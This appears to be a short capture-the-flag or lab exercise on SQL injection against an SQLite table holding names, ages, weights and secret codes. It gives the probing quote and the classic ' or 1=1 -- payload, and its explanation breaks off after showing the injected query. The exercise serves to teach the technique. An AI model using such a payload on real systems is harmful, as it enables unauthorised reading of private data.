Obtain flag from the current table in Sqlite DBMS.
| ID | Name | Age | Weight | Secret |
|---|---|---|---|---|
| 1 | Kimberly Alexander | 69 | 59 | M06108701 |
| 2 | Melissa Carrillo | 89 | 44 | 586197224 |
| 3 | Tanya Sullivan | 2 | 61 | Y52136931 |
1. Enter ', send request and observe the error.
2. Enter ' or 1=1 -- and obtain the flag.
Explanation: in query SELECT * FROM capybaras WHERE name ='1' or 1=1 -- ':